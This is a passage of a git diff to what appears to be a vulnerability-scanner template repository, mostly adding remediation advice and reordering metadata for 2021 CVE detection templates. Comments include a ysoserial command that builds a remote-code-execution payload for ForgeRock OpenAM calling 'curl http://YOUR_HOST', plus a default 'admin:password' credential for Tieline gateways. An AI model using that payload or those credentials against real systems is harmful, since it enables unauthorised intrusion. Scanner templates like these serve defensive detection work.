sanitization. reference: - https://www.exploit-db.com/exploits/49990 - https://www.accela.com/civic-platform/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-34370 cwe-id: CWE-79 epss-score: 0.00183 - cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* epss-percentile: 0.54871 + cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: accela diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index c3f2239732..801d73d64f 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty. reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-34429 cwe-id: CWE-200 epss-score: 0.79921 - cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* epss-percentile: 0.97877 + cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eclipse diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 74161e0185..670e7ae83c 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. reference: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473 - remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-34473 cwe-id: CWE-918 epss-score: 0.97443 - cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* epss-percentile: 0.99916 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 2 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 0c60b8728d..e7784016b7 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. + remediation: | + Update to the latest version of ProfilePress to fix the admin user creation weakness. reference: - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-34621 cwe-id: CWE-306,CWE-269 epss-score: 0.79769 - cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97869 + cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 - framework: wordpress vendor: properfraction product: profilepress + framework: wordpress tags: wordpress,wp-plugin,packetstorm,cve,cve2021,intrusive http: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 994841813e..6994ab8bee 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts. + remediation: | + Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-34640 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: securimage-wp-fixed_project product: securimage-wp-fixed + framework: wordpress tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated http: diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index d6e66e046a..6ea1f0e6ea 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + remediation: | + Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-34643 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: skaut-bazar_project product: skaut-bazar + framework: wordpress tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated http: diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index c7b8f385d1..8e75717a4f 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal. + remediation: | + Apply the latest security patch or update to a non-vulnerable version of FAUST iServer. reference: - https://cxsecurity.com/issue/WLB-2022010120 - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-34805 cwe-id: CWE-22 epss-score: 0.01996 - cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* epss-percentile: 0.87368 + cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: land-software diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 2e287ef617..664549e65b 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -6,26 +6,26 @@ info: severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250 - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg - https://nvd.nist.gov/vuln/detail/CVE-2021-35250 - remediation: Resolved in Serv-U 15.3 Hotfix 1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.04866 - cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* epss-percentile: 0.91736 + cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: product:"Rhinosoft Serv-U httpd" vendor: solarwinds product: serv-u + shodan-query: product:"Rhinosoft Serv-U httpd" tags: cve,cve2021,solarwinds,traversal http: diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index c944fb215e..14a6e0ae1b 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." + remediation: | + Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265). reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-35265 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* epss-percentile: 0.46567 + cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: html:'content="MaxSite CMS' vendor: maxsite product: maxsite_cms + shodan-query: html:'content="MaxSite CMS' tags: cve,cve2021,maxsite,xss http: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index be0104ede0..164e6d7678 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -5,6 +5,8 @@ info: author: Pratik Khalane severity: critical description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account. + remediation: | + Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability. reference: - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-35336 cwe-id: CWE-1188 epss-score: 0.08033 - cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.93455 + cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tieline @@ -48,4 +50,4 @@ http: status: - 200 -# admin:password +# admin:password \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 10b5ccbe00..549d2557dc 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server. reference: - https://www.swascan.com/solari-di-udine/ - https://www.exploit-db.com/exploits/50638 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-35380 cwe-id: CWE-22 epss-score: 0.16223 - cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* epss-percentile: 0.95287 + cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: solari diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 43a1ce6e87..5f2ae560d6 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -9,6 +9,8 @@ info: The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier. + remediation: | + Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability. reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464 @@ -21,13 +23,13 @@ info: cve-id: CVE-2021-35464 cwe-id: CWE-502 epss-score: 0.97364 - cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* epss-percentile: 0.99844 + cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"OpenAM" vendor: forgerock product: am + shodan-query: http.title:"OpenAM" tags: packetstorm,cve,cve2021,openam,rce,java,kev http: @@ -54,4 +56,4 @@ http: - 200 # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= -# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' +# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 60d9fc7cb3..aeaf059913 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. + remediation: | + Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.gruppotim.it/redteam - https://www.thruk.org/changelog.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* epss-percentile: 0.49646 + cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Thruk" verified: true + max-request: 1 vendor: thruk product: thruk + shodan-query: http.html:"Thruk" tags: cve,cve2021,thruk,xss http: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 481c104598..4d87bbf8cc 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 @@ -16,15 +18,15 @@ info: cve-id: CVE-2021-35587 cwe-id: CWE-502 epss-score: 0.96868 - cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* epss-percentile: 0.99568 + cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: body="/oam/pages/css/login_page.css" - shodan-query: http.title:"Oracle Access Management" + max-request: 1 vendor: oracle product: access_manager + shodan-query: http.title:"Oracle Access Management" + fofa-query: body="/oam/pages/css/login_page.css" tags: cve,cve2021,oam,rce,java,unauth,oracle,kev http: diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index ddee7b8022..b84aad6b6b 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. reference: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 epss-score: 0.97158 - cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99701 + cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: binatoneglobal diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index e1fdec2474..b73548088c 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -5,6 +5,8 @@ info: author: pdteam,gy741,johnk3r severity: critical description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + remediation: | + Apply the latest firmware update provided by Hikvision to mitigate this vulnerability. reference: - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-36260 cwe-id: CWE-78 epss-score: 0.97514 - cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99972 + cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:999357577 vendor: hikvision product: ds-2cd2026g2-iu\/sl_firmware + shodan-query: http.favicon.hash:999357577 tags: cve,cve2021,hikvision,rce,iot,intrusive,kev http: diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index e294b7877e..5bbe3c9c93 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + remediation: | + Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-36356 cwe-id: CWE-434 epss-score: 0.92269 - cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* epss-percentile: 0.98579 + cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kramerav diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index fbb672303c..354a18df6c 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. + remediation: | + Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ - https://nvd.nist.gov/vuln/detail/CVE-2021-36380 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-36380 cwe-id: CWE-78 epss-score: 0.96993 - cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* epss-percentile: 0.9962 + cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sunhillo diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index d7d706c130..eaf8cd4164 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization. reference: - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-36450 cwe-id: CWE-79 epss-score: 0.00468 - cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* epss-percentile: 0.72463 + cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"Verint Sign-in" verified: true + max-request: 2 vendor: verint product: workforce_optimization + shodan-query: title:"Verint Sign-in" tags: cve,cve2021,xss,verint http: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index cee60b719b..87d84d78ad 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application. reference: - https://seclists.org/oss-sec/2021/q3/188 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-3654 cwe-id: CWE-601 epss-score: 0.93152 - cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* epss-percentile: 0.98686 + cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openstack diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index b9444c8df1..ba8f7f725e 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. + remediation: | + Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability. reference: - https://www.icewarp.com/ - https://twitter.com/shifacyclewala/status/1443298941311668227 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00212 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-percentile: 0.58419 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"icewarp" + max-request: 1 vendor: icewarp product: icewarp_server + shodan-query: title:"icewarp" tags: cve,cve2021,icewarp,redirect http: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index f80440e573..dffb3a8186 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. + remediation: | + Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/ - https://alysum5.promokit.eu/promokit/documentation/blog/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.00805 - cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* epss-percentile: 0.79534 + cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 - framework: prestashop vendor: prestahome product: blog + framework: prestashop tags: cve,cve2021,prestashop,prestahome,sqli,cms http: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index bd19cbd423..bc0b41941c 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: medium description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + remediation: | + Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability. reference: - https://github.com/BrucessKING/CVE-2021-36749 - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-36749 cwe-id: CWE-863 epss-score: 0.94684 - cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* epss-percentile: 0.98933 + cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 813aeba24f..1c0688e52a 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress iQ Block Country plugin (>=1.2.12) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58 - https://wordpress.org/plugins/iq-block-country/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-36873 cwe-id: CWE-79 epss-score: 0.00131 - cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47313 + cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: webence product: iq_block_country + framework: wordpress tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 3da3d82629..fbbc7a3e47 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data. + remediation: | + Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. reference: - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html - https://nvd.nist.gov/vuln/detail/CVE-2021-37216 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-37216 cwe-id: CWE-79 epss-score: 0.00106 - cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* epss-percentile: 0.42468 + cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: qsan diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 3552f160d3..575a89fa1d 100644 --- 